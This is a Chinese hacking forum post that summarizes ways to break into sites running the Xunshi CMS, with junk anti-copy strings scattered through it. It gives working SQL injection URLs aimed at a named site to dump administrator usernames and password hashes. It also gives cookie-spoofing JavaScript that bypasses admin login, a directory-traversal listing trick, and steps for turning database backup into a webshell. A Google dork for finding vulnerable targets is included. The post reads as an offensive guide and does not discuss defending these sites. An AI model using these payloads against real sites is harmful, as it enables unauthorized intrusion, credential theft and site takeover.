讯时漏洞总结

admin

by:血封忆尘
- u; n# s. q7 G; |
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

# j) U/ y2 `  J: p4 H' \4 g以下本文总结来自黑防去年第9期杂志上的内容...
7 |/ k5 c* a4 n4 Q, G
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

. j3 z( E  F# B* B9 O5 l26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

. b! {+ I* a& S( ~8 \' h记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
5 i( T" G  j6 W* @: M3 P这里一个注入

  e2 }- }' v5 M效果如图:
* r+ k8 O. f2 @4 A
# c! u; o. K6 f! ]' r& ]8 M
( H9 E$ Z( ^* n- i
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
& }0 M* |  {8 e; C
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
! A9 X3 M! x; z7 R  m
$ D3 r" r# S$ i' o8 i: F' m5 cjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

+ q/ _( u- z! `7 S1 q2 J7 `! q它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以

/ _8 d& ?7 b: R* I访问这页面来列目录..步骤如下:

javascript:alert(document.cookie="admindj=1")
/ H# {$ w' d7 y6 ~
# {& P/ z2 _( z5 {: A1 h: H. vhttp://www.political-security.co ... asp?id=46&dir=../..
% W4 E) E- ~" Y/ _" I
$ D" ~, ^2 d0 [. b效果如图:



这样全站目录都能瞧了..找到后台目录..进去..
! [3 x$ X3 o7 e6 }3 c
4 k* C% x7 }+ s. ?. l那么进了后台怎么拿shell？？上传--备份就ok了..

那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
7 M0 O( O# k' |  g+ ^( ^5 |( A
' x; Z  [7 F9 ^" W9 ^7 [' k  X* ]这个我也碰到过一次..你都可以通过列目录来实现..
* e% h: Y: g: g1 L0 Q  i4 r" r+ v2 S
! r& |  v) k# j* z2 {9 Wjavascript:alert(document.cookie="admindj=1")
4 ?, C) p0 O! B0 S
4 ^9 u; J3 ^& thttp://www.political-security.co ... p?action=BackupData
; ^2 L, _, J$ Z- g; O9 }7 q) E# w$ C
备份ok..

那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
; S2 O; x" E( x
* c% `3 b! o- M: t6 j在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
( c) r( k* R$ z4 W
然后访问此页面进行注入..步骤如下:
+ \# j9 @; Q( n
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

7 ]* d- r% t( Y( ?1 P; N6 e然后请求admin/admin_chk.asp页面
" ?+ ?" s! w" {& n+ A" x
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
  N' s6 _% r/ y* f# H: m
效果如图所示:
7 p1 B. ^/ z( o4 P8 j

8 _* F1 X, U1 R! t6 l6 }( F
+ G5 }, [' n% `) S9 M! J. x7 m讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）

8 ^$ h4 v% s' L- ^/ D1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句

0 D1 V# d2 v. _  ^9 [; t2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！



3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='


9 {# k5 ?' p6 Q
8 O$ p. t+ M9 T; j# ]7 L1 f' u9 u4 V爆出管理员帐号和密码了
3 V8 b$ a, a( W& `( T: H8 g- _: z
1 E+ J4 l8 _) W+ E
, Y( v. u* s  e: G) k, g; X. _
% ~0 Q- o) K2 v6 S4、cookies进后台
$ R+ n; x1 T  g/ R2 c
0 Q( K, ]& D8 M7 Ojavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
; r5 h! j2 P& R4 N9 a/ d
+ w7 R/ ^; i4 d& U

5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！



6、后台有上传和备份取SHELL不难。
0 L, t! U& ^3 V) T/ H
5 p9 v/ m$ B3 R; |' J$ @2 B$ [7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..
5 n+ `! W' v! H4 F
; n& ~, G, |( z! b! a  r4 c逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！

; q/ T2 m3 p% \

3 C3 D' S& c, Z9 l5 b: U